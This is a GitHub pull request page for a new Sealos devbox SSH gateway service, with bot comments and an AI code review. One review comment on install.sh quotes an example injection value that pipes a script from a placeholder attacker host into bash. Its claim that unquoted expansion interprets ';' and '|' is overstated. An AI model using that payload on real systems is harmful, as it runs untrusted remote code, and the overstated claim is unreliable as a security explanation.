Skip to content

feat: add devbox ssh gateway service #6257

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
wants to merge 2 commits into
base: main
Choose a base branch
from
Open

feat: add devbox ssh gateway service #6257

wants to merge 2 commits into from

Conversation

@zijiren233
Copy link
Member

@zijiren233 zijiren233 commented Nov 27, 2025

No description provided.

@zijiren233 zijiren233 requested review from a team as code owners November 27, 2025 11:00
@pull-request-size
Copy link

pull-request-size bot commented Nov 27, 2025

Whoa! Easy there, Partner!

This PR is too big. Please break it up into smaller PRs.

@github-actions
Copy link
Contributor

github-actions bot commented Nov 27, 2025

We require pull request titles to follow the Conventional Commits specification and it looks like your proposed title needs to be adjusted.

Details:

No scope found in pull request title "feat: add devbox ssh gateway service".

@zijiren233 zijiren233 added this to the v5.2 milestone Nov 27, 2025
@zijiren233 zijiren233 requested a review from a team as a code owner November 27, 2025 11:05
@dinoallo dinoallo requested a review from Copilot November 27, 2025 11:12
Copilot finished reviewing on behalf of dinoallo November 27, 2025 11:16
Copilot AI reviewed Nov 27, 2025
View reviewed changes
Copy link
Contributor

Copilot AI left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull request overview

This PR introduces a new SSH gateway service for Sealos Devbox that enables SSH access to devbox pods via public key authentication. The gateway acts as a proxy that routes SSH connections based on client public keys to the appropriate backend devbox pods.

Key changes:

  • New SSH gateway service with multi-mode authentication support (public key, agent forwarding, proxy jump)
  • Kubernetes integration using informers to watch Secrets and Pods
  • Comprehensive test coverage across all components
  • Helm chart for deployment as a DaemonSet
  • Go version updates across CI workflows

Reviewed changes

Copilot reviewed 54 out of 55 changed files in this pull request and generated 1 comment.

Show a summary per file
File Description
.github/workflows/*.yml Updated Go version from 1.23/1.20/1.22/1.24 to 1.25 (problematic)
service/sshgate/gateway/*.go Core gateway implementation with authentication and proxying logic
service/sshgate/registry/*.go Thread-safe registry for mapping SSH keys to devbox pods
service/sshgate/config/*.go Configuration management with validation
service/sshgate/informer/*.go Kubernetes informer integration for real-time sync
service/sshgate/deploy/chart/* Helm chart templates for DaemonSet deployment
service/sshgate/*_test.go Comprehensive unit and integration tests
service/go.work Added sshgate to Go workspace
.golangci.yml Updated Go version to 1.24

service/sshgate/deploy/install.sh

HELM_OPTS=${HELM_OPTS:-""}

helm upgrade -i sshgate -n devbox-system --create-namespace charts ${HELM_OPTS} --wait
Copy link

Copilot AI Nov 27, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

HELM_OPTS is expanded unquoted in the helm upgrade command, allowing shell metacharacters (e.g., ;, &&, |) to be interpreted and enabling command injection if an attacker can influence the environment. An attacker could set HELM_OPTS='; curl https://attacker/evil.sh | bash' to execute arbitrary commands during install. Quote the variable and use eval-free argument passing, e.g.,

helm upgrade -i sshgate -n devbox-system --create-namespace charts --wait ${HELM_OPTS:+${HELM_OPTS}}

or better, parse known-safe flags into an array:

HELM_ARGS=(upgrade -i sshgate -n devbox-system --create-namespace charts --wait)
# append vetted options only
helm "${HELM_ARGS[@]}"

Copilot uses AI. Check for mistakes.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

Copilot code review Copilot Copilot left review comments

At least 1 approving review is required to merge this pull request.

Assignees

No one assigned

Labels

area/ci area/cloud area/test area/workflow size/XXL

Projects

Devbox-v2.5
Status: No status

Milestone

v5.2

Development

Successfully merging this pull request may close these issues.

1 participant

@zijiren233